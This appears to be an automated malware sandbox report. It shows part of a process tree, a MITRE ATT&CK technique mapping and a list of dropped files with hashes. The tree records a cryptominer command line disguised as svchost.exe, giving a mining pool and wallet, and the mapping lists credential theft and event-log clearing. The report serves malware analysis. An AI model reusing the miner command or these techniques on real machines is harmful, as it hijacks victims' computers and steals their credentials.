                                                                                                                            "C:\Windows\System32\svchost.exe" --algo rx/0 --url pool.supportxmr.com:8080 --user 46M39DM1DQjFKUnT3t2KiHNU6qQjmRF79J31fSbtBNafUX9B2gAwysjLFADQ5mhqR4M6C8JJRFXwLPxDHapuCrHE3mRBjTw/lunarig --cpu-max-threads-hint=80
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                            PID:2184
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              8⤵
                                                                                                                                PID:2628
                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                            "C:\Windows\SysWOW64\explorer.exe"
                                                                                                                            6⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:3268
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\The%20Foundry.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\The%20Foundry.exe"
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1616
                                                                                                                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                            6⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:1364
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\a\@bebanrti%20(1).exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\a\@bebanrti%20(1).exe"
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5072
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                  1⤵
                                                                                                                    PID:3472
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                                    1⤵
                                                                                                                      PID:3512
                                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:3864
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:3924
                                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                          1⤵
                                                                                                                            PID:3948
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                                            1⤵
                                                                                                                              PID:4024
                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                                              1⤵
                                                                                                                                PID:4216
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                                1⤵
                                                                                                                                  PID:4420
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                                  1⤵
                                                                                                                                    PID:4816
                                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                                    C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:3796
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                                      1⤵
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:2064
                                                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      PID:4144
                                                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                                      1⤵
                                                                                                                                        PID:1428
                                                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                                        1⤵
                                                                                                                                          PID:1560
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                          1⤵
                                                                                                                                            PID:2772
                                                                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                                            1⤵
                                                                                                                                              PID:2088
                                                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                              1⤵
                                                                                                                                                PID:4436
                                                                                                                                              • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                                                                                                                                                "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                                1⤵
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                • Enumerates system info in registry
                                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:4720
                                                                                                                                              • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:448
                                                                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                                                                  C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3152
                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1572 -ip 1572
                                                                                                                                                      2⤵
                                                                                                                                                        PID:760

                                                                                                                                                    Network

                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                    Reconnaissance

                                                                                                                                                    Resource Development

                                                                                                                                                    Initial Access

                                                                                                                                                    Execution

                                                                                                                                                    Command and Scripting Interpreter

                                                                                                                                                    1
                                                                                                                                                    T1059

                                                                                                                                                    PowerShell

                                                                                                                                                    1
                                                                                                                                                    T1059.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Persistence

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Power Settings

                                                                                                                                                    1
                                                                                                                                                    T1653

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Privilege Escalation

                                                                                                                                                    Boot or Logon Autostart Execution

                                                                                                                                                    1
                                                                                                                                                    T1547

                                                                                                                                                    Registry Run Keys / Startup Folder

                                                                                                                                                    1
                                                                                                                                                    T1547.001

                                                                                                                                                    Scheduled Task/Job

                                                                                                                                                    1
                                                                                                                                                    T1053

                                                                                                                                                    Scheduled Task

                                                                                                                                                    1
                                                                                                                                                    T1053.005

                                                                                                                                                    Defense Evasion

                                                                                                                                                    File and Directory Permissions Modification

                                                                                                                                                    1
                                                                                                                                                    T1222

                                                                                                                                                    Indicator Removal

                                                                                                                                                    1
                                                                                                                                                    T1070

                                                                                                                                                    Clear Windows Event Logs

                                                                                                                                                    1
                                                                                                                                                    T1070.001

                                                                                                                                                    Modify Registry

                                                                                                                                                    1
                                                                                                                                                    T1112

                                                                                                                                                    Credential Access

                                                                                                                                                    Credentials from Password Stores

                                                                                                                                                    1
                                                                                                                                                    T1555

                                                                                                                                                    Credentials from Web Browsers

                                                                                                                                                    1
                                                                                                                                                    T1555.003

                                                                                                                                                    Unsecured Credentials

                                                                                                                                                    1
                                                                                                                                                    T1552

                                                                                                                                                    Credentials In Files

                                                                                                                                                    1
                                                                                                                                                    T1552.001

                                                                                                                                                    Discovery

                                                                                                                                                    Browser Information Discovery

                                                                                                                                                    1
                                                                                                                                                    T1217

                                                                                                                                                    Peripheral Device Discovery

                                                                                                                                                    1
                                                                                                                                                    T1120

                                                                                                                                                    Query Registry

                                                                                                                                                    5
                                                                                                                                                    T1012

                                                                                                                                                    System Information Discovery

                                                                                                                                                    4
                                                                                                                                                    T1082

                                                                                                                                                    System Location Discovery

                                                                                                                                                    1
                                                                                                                                                    T1614

                                                                                                                                                    System Language Discovery

                                                                                                                                                    1
                                                                                                                                                    T1614.001

                                                                                                                                                    Lateral Movement

                                                                                                                                                    Collection

                                                                                                                                                    Data from Local System

                                                                                                                                                    1
                                                                                                                                                    T1005

                                                                                                                                                    Email Collection

                                                                                                                                                    1
                                                                                                                                                    T1114

                                                                                                                                                    Command and Control

                                                                                                                                                    Web Service

                                                                                                                                                    1
                                                                                                                                                    T1102

                                                                                                                                                    Exfiltration

                                                                                                                                                    Impact

                                                                                                                                                    Replay Monitor

                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                    Downloads

                                                                                                                                                    • C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                      Filesize

                                                                                                                                                      761KB

                                                                                                                                                      MD5

                                                                                                                                                      c6040234ee8eaedbe618632818c3b1b3

                                                                                                                                                      SHA1

                                                                                                                                                      68115f8c3394c782aa6ba663ac78695d2b80bf75

                                                                                                                                                      SHA256

                                                                                                                                                      bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0

                                                                                                                                                      SHA512

                                                                                                                                                      a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
                                                                                                                                                      Filesize

                                                                                                                                                      8KB

                                                                                                                                                      MD5

                                                                                                                                                      69994ff2f00eeca9335ccd502198e05b

                                                                                                                                                      SHA1

                                                                                                                                                      b13a15a5bea65b711b835ce8eccd2a699a99cead

                                                                                                                                                      SHA256

                                                                                                                                                      2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

                                                                                                                                                      SHA512

                                                                                                                                                      ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\CDC75E00
                                                                                                                                                      Filesize

                                                                                                                                                      21KB

                                                                                                                                                      MD5

                                                                                                                                                      479704a16ee110617cdec7cffcc7075b

                                                                                                                                                      SHA1

                                                                                                                                                      3b68ab7fda2e2183c330a9f626e7d53cc2695bfa

                                                                                                                                                      SHA256

                                                                                                                                                      61b7947baa61615b5172fb14eeb5427f29489551d30e41d6a0d848574886a8ae

                                                                                                                                                      SHA512

                                                                                                                                                      c9833b6a50ba56e5635159d10ebe7766c6d16734a32745c0521f09c5e8084ab30ae0fe92a77cea9f594a8f3f0aa3004fa0c0ad53371d3febe80f5fcaac5ba575

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\VCRUNTIME140.dll
                                                                                                                                                      Filesize

                                                                                                                                                      106KB

                                                                                                                                                      MD5

                                                                                                                                                      4585a96cc4eef6aafd5e27ea09147dc6

                                                                                                                                                      SHA1

                                                                                                                                                      489cfff1b19abbec98fda26ac8958005e88dd0cb

                                                                                                                                                      SHA256

                                                                                                                                                      a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

                                                                                                                                                      SHA512

                                                                                                                                                      d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\_bz2.pyd
                                                                                                                                                      Filesize

                                                                                                                                                      82KB

                                                                                                                                                      MD5

                                                                                                                                                      c7ce973f261f698e3db148ccad057c96

                                                                                                                                                      SHA1

                                                                                                                                                      59809fd48e8597a73211c5df64c7292c5d120a10

                                                                                                                                                      SHA256

                                                                                                                                                      02d772c03704fe243c8de2672c210a5804d075c1f75e738d6130a173d08dfcde

                                                                                                                                                      SHA512

                                                                                                                                                      a924750b1825747a622eef93331fd764d824c954297e37e8dc93a450c11aa7ab3ad7c3b823b11656b86e64de3cd5d409fda15db472488dfaa4bb50341f0b29d1

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\_ctypes.pyd
                                                                                                                                                      Filesize

                                                                                                                                                      121KB

                                                                                                                                                      MD5

                                                                                                                                                      10fdcf63d1c3c3b7e5861fbb04d64557

                                                                                                                                                      SHA1

                                                                                                                                                      1aa153efec4f583643046618b60e495b6e03b3d7

                                                                                                                                                      SHA256

                                                                                                                                                      bc3b83d2dc9e2f0e6386ed952384c6cf48f6eed51129a50dfd5ef6cbbc0a8fb3

                                                                                                                                                      SHA512

                                                                                                                                                      dc702f4100ed835e198507cd06fa5389a063d4600fc08be780690d729ab62114fd5e5b201d511b5832c14e90a5975ed574fc96edb5a9ab9eb83f607c7a712c7f

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\_lzma.pyd
                                                                                                                                                      Filesize

                                                                                                                                                      155KB

                                                                                                                                                      MD5

                                                                                                                                                      4e2239ece266230ecb231b306adde070

                                                                                                                                                      SHA1

                                                                                                                                                      e807a078b71c660db10a27315e761872ffd01443

                                                                                                                                                      SHA256

                                                                                                                                                      34130d8abe27586ee315262d69af4e27429b7eab1f3131ea375c2bb62cf094be

                                                                                                                                                      SHA512

                                                                                                                                                      86e6a1eab3529e600dd5caab6103e34b0f618d67322a5ecf1b80839faa028150c492a5cf865a2292cc8584fba008955da81a50b92301583424401d249c5f1401

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-console-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      e4a519ef5d0a378ea82c423fe1e4586e

                                                                                                                                                      SHA1

                                                                                                                                                      ae69723c2540eb1c13ef047c3df25e103e6ec1d9

                                                                                                                                                      SHA256

                                                                                                                                                      5c1cbd16acf9191f17525f5dd887d944b4eb0083c5ec1adb68ce1b82639182ae

                                                                                                                                                      SHA512

                                                                                                                                                      6be292efb363b5e00b4f303621a90d6ea20cf3512e3538508c58bc12f6ac024080eb9f0bc2ea112935ad0a955b05d19d784d22de815ba0c2b4feaf6412d11a07

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-datetime-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      b3f46f0820b641c5a9a9d0a4bfc94355

                                                                                                                                                      SHA1

                                                                                                                                                      1aa8579aa13d4075c4082245317cb1dcc4ba6b4e

                                                                                                                                                      SHA256

                                                                                                                                                      e353ecf9deb083da0f00f40f2fe99cc4eea4a904e7118a1cac4ef6e43f89b154

                                                                                                                                                      SHA512

                                                                                                                                                      67a678e125e9e0ce0b9c5fed35cad0513c3b5ff6f86760b32991cfeff5234ec65840c808be2911d57876d8c49076302033e8dcb5032a05f4c0e11964d81b33e8

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-debug-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      f91f7dc238de2c03dc64aa5d2e3b4e49

                                                                                                                                                      SHA1

                                                                                                                                                      53b1fe15e7a9800456f063e8dbd11f240f6095a3

                                                                                                                                                      SHA256

                                                                                                                                                      d3b5273eccc758493c9cfac5cc43ea74f08216bb1c195609ab27e9b2a241d8b3

                                                                                                                                                      SHA512

                                                                                                                                                      d8db7213a4bb58bb497d4ee2d06a021a607436ca691462d0dc0c06c17ae345349d03406729a399d2931715cb6dc5a653247851dce701a02e254d8a258bea7fcb

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-errorhandling-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      31990aaab1aeeae6bff96eaf3809eda9

                                                                                                                                                      SHA1

                                                                                                                                                      aa2cd6fab320643eaeb41303d5b3a802cd2365da

                                                                                                                                                      SHA256

                                                                                                                                                      d71714c34fabf8a93ae316a0d8679bb8cdc843f6128c9afd42e18e0de70b1a91

                                                                                                                                                      SHA512

                                                                                                                                                      d25baf53f667d8e2239141c846a59c08636b887c8c11ba60b61992f91765c0a3cf9a993fc2017191b9cd8f0735b6c9af19bb0ecd8eff16d293f17cdc1d3b9059

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-file-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      21KB

                                                                                                                                                      MD5

                                                                                                                                                      b90485eb6d2e835f975c6f1011be880f

                                                                                                                                                      SHA1

                                                                                                                                                      714ff49459f0c0743d2d8c6784e6d28ea7f81599

                                                                                                                                                      SHA256

                                                                                                                                                      72e79ce895ab6506d2c85bcd1709ef6a250b63c990c76c9df530ec4e5b5cbb6a

                                                                                                                                                      SHA512

                                                                                                                                                      78d09d109b3f5d796aa1f7148437a9ba49062c011fea4a0cda43ef7616176f1ad3c00aeb8b204b264e6bbd27c66afc710e221536529f0a66bf65424c52de15ae

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-file-l1-2-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      19df2b0f78dc3d8c470e836bae85e1ff

                                                                                                                                                      SHA1

                                                                                                                                                      03f2b5b848a51ee52980bf8595c559b89865de07

                                                                                                                                                      SHA256

                                                                                                                                                      bd9e07bbc62ce82dbc30c23069a17fbfa17f1c26a9c19e50fe754d494e6cd0b1

                                                                                                                                                      SHA512

                                                                                                                                                      c1c2b97f484e640bfdda17f7ed604d0583c3d4eaf21abf35491ccedc37fa4866480b59a692776687e5fda3eaeafb4c7bdb34dec91f996fd377a328a89c8d5724

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-file-l2-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      adb3471f89e47cd93b6854d629906809

                                                                                                                                                      SHA1

                                                                                                                                                      2cfc0c379fd7f23db64d15bdff2925778ff65188

                                                                                                                                                      SHA256

                                                                                                                                                      355633a84db0816ab6a340a086fb41c65854c313bd08d427a17389c42a1e5b69

                                                                                                                                                      SHA512

                                                                                                                                                      f53e11aa35911d226b676d454e873d0e84c189dd1caea8a0fe54d738933cd6b139eca48630f37f5979ef898950d99f3277cba6c7a697103f505d876bea62818c

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-handle-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      968c1759f5d4aa2bed859a2df67acc8f

                                                                                                                                                      SHA1

                                                                                                                                                      2890a554fd106cc6572213e55c3a932be6eaadcd

                                                                                                                                                      SHA256

                                                                                                                                                      8a52a26afaf4d7cd698cf79dcd339ec3f1b3ab3c0031a8ae9064d50f63462b99

                                                                                                                                                      SHA512

                                                                                                                                                      cd903b6909d7a55e3b1b3c6894d3774bac758279bb7b62dcd6b94dc8991e98106f59dda9f3e312a1d8d3de17383d905f33bdfb96992517bcfd9b8fa52b3f7de2

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-heap-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      11a672968ce4879767afaf573e4ede0c

                                                                                                                                                      SHA1

                                                                                                                                                      79abb1976f249f6b45014fd692af6fca4e3ded06

                                                                                                                                                      SHA256

                                                                                                                                                      6a803d6cbe4dcbb6e4c9e8b8945d92d7edbd1f51cfb875d3d6c312d83840dde2

                                                                                                                                                      SHA512

                                                                                                                                                      460bb15ac2baa8d802988cc9a22ad68acf413aa1e0584c451c686ac5a86055007cc35ba0035464811179a0e0641b28a77b6a306873eb803b0719cc7857a8b9c7

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-interlocked-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      7ee0013d07ed45c081df41e64ab14889

                                                                                                                                                      SHA1

                                                                                                                                                      5f4543e008cbe86c0f14e2bfc2f803cf38d34c40

                                                                                                                                                      SHA256

                                                                                                                                                      26f90d2086687edf6fc02be5dcfd7575faad2022c3d716cdd0b5ca3e70a3c022

                                                                                                                                                      SHA512

                                                                                                                                                      7c083a20ea9fa3903234abc642730527ef68f96b05732d8befd8d6daf1204bfdcc51fa1996fa2fb8d532825142b4fca3fd9c4ce5be43fa9a3edc2ad8afed6c34

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-libraryloader-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      3e3a777cad2aafde613836ee88179a58

                                                                                                                                                      SHA1

                                                                                                                                                      fe55ffef83601f654504f0a2256e11e1913635db

                                                                                                                                                      SHA256

                                                                                                                                                      4a02983d6632c2fb92409d56269ca9a5bb0c31d33a8f2a89b0ab847d263c3f96

                                                                                                                                                      SHA512

                                                                                                                                                      e217d4fc5bc832623cea21c86b74b97018d1bfad46e65cef36476f6e2ebec7dcfe814c0d848182e9fd8dd3cb26eef04ba9b77df394501b1d808f6cd689aa813d

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-localization-l1-2-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      20KB

                                                                                                                                                      MD5

                                                                                                                                                      6b4f2ca3efceb2c21e93f92cdc150a9d

                                                                                                                                                      SHA1

                                                                                                                                                      2532af7a64ef4b5154752f61290dcf9ebeea290f

                                                                                                                                                      SHA256

                                                                                                                                                      b39a515b9e48fc6589703d45e14dcea2273a02d7fa6f2e1d17985c0228d32564

                                                                                                                                                      SHA512

                                                                                                                                                      63a42dd1cb95fd38ddde562108c78e39cb5d7c9406bf749339e717c2cd866f26268d49b6bd966b338de1c557a426a01a24c2480f64762fef587bc09d44ada53b

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-memory-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      d14c0b3bc3032a043ddffbc39d26db7c

                                                                                                                                                      SHA1

                                                                                                                                                      c196d43f13c6bf8f0596e3c9b9f54a555099ed48

                                                                                                                                                      SHA256

                                                                                                                                                      d699e0c0de1d2f12bb69b3d464faa7ad4734d18a3e725877d8a96aabf29c0542

                                                                                                                                                      SHA512

                                                                                                                                                      a4913cc0ed609764c9c5ebdb46d888af332394fd8efc9be173b2795f2ac00901b3f7643d83ebd2faf0ddc5fd75df5520687daa5b85a2b9a2f9775accecb7aaa9

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-namedpipe-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      627327251bc258aa258848de32b698ba

                                                                                                                                                      SHA1

                                                                                                                                                      dd5831226ba1ed697cb1b74b3a4136ca17aba19a

                                                                                                                                                      SHA256

                                                                                                                                                      5ebd891df029e795372f8665db7f15b4964d434aa8d58eb2b50634bc58d74132

                                                                                                                                                      SHA512

                                                                                                                                                      874a76efd19d1ad5f479b975bfe23ae70b3049f872d7371b461de48f3f3a2f76346d6eab406529b32d05fa0894b716ddd2f27980b8e5332b241dce168afc9261

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-processenvironment-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      19KB

                                                                                                                                                      MD5

                                                                                                                                                      f4f8bd9a68cecff1d22204d29cf8a914

                                                                                                                                                      SHA1

                                                                                                                                                      1fbd4fc3c3edae151ee2d4ad4861a6667a736f44

                                                                                                                                                      SHA256

                                                                                                                                                      6088c2aa22ae8a579518c347163571e243d9a74d542176d63520f370040382e3

                                                                                                                                                      SHA512

                                                                                                                                                      3d9da1e0d4531cb006ba72d0afaf49bc54a4db9f782125a375444b1e97d012d4caf6bdd26128614362137c6aac616ce6d84bda24c629a4e59b55347f69b12b5c

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-processthreads-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      20KB

                                                                                                                                                      MD5

                                                                                                                                                      c12244db4c14058f457bfb3b9a1fd21f

                                                                                                                                                      SHA1

                                                                                                                                                      8c96972da78b6424958cf976dc7313497ebeaeb5

                                                                                                                                                      SHA256

                                                                                                                                                      bc5ddb364256a38e57b21b1a16b5736a8eacbae32b4c3760514cf51629066881

                                                                                                                                                      SHA512

                                                                                                                                                      da1bb9099e5fa0c65ae361ef10bd06199b76132bb40cfc3078824fcdfb8032ff745ca852edf65ec5e0e948d5e1413cc219bbba366906d417095b9e46bdea6011

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-processthreads-l1-1-1.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      247061d7c5542286aeddade76897f404

                                                                                                                                                      SHA1

                                                                                                                                                      7285f85440b6eff8731943b73502f58ae40e95a2

                                                                                                                                                      SHA256

                                                                                                                                                      ccb974c24ddfa7446278ca55fc8b236d0605d2caaf273db8390d1813fc70cd5b

                                                                                                                                                      SHA512

                                                                                                                                                      23ef467f6bb336d3e8c38000d30a92dac68e2662891863475ff18dbddbbbce909c12d241b86dbdea085e7d19c82cd20d80a60ffb2845f6afebedf06507afe5bc

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-profile-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      17KB

                                                                                                                                                      MD5

                                                                                                                                                      f8a266ba5362a17c89df60b5b5ebef41

                                                                                                                                                      SHA1

                                                                                                                                                      7f3f9d5875ef3c2d79667a1231d85d9eb619fbc9

                                                                                                                                                      SHA256

                                                                                                                                                      753494588fa1c14146a9a3f7d0f02ddd0a6850ba6a719e2513a64cf9dbf1ae7d

                                                                                                                                                      SHA512

                                                                                                                                                      12bebb1186974a9974aaae5630d0957f339c96add2d8bb4bb35ee4b97873fd8d23d73e427ccdee984f0baa79aa2406b25ed198e2e7ad8212ee087be8229c0be9

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-rtlsupport-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

                                                                                                                                                      fdb1476dcb99850f82b9567956a7a46b

                                                                                                                                                      SHA1

                                                                                                                                                      d2d1004fbecb1e25f26da7a6a3d8f7a87fb1ee7a

                                                                                                                                                      SHA256

                                                                                                                                                      ea04e9b6cf4646d36ab691ff93964f0c7b0b01fd194b8db37a96fb1513ae656a

                                                                                                                                                      SHA512

                                                                                                                                                      eef15096b7535f13795102442619d8e6651c49b119261c09fe4404cdbd4dc2e63f3a073e92365d67598076501f26485dc6eeb6c2bbae9ec882319fd5ee4f7629

                                                                                                                                                      Download Submit

                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI6402\api-ms-win-core-string-l1-1-0.dll
                                                                                                                                                      Filesize

                                                                                                                                                      18KB

                                                                                                                                                      MD5

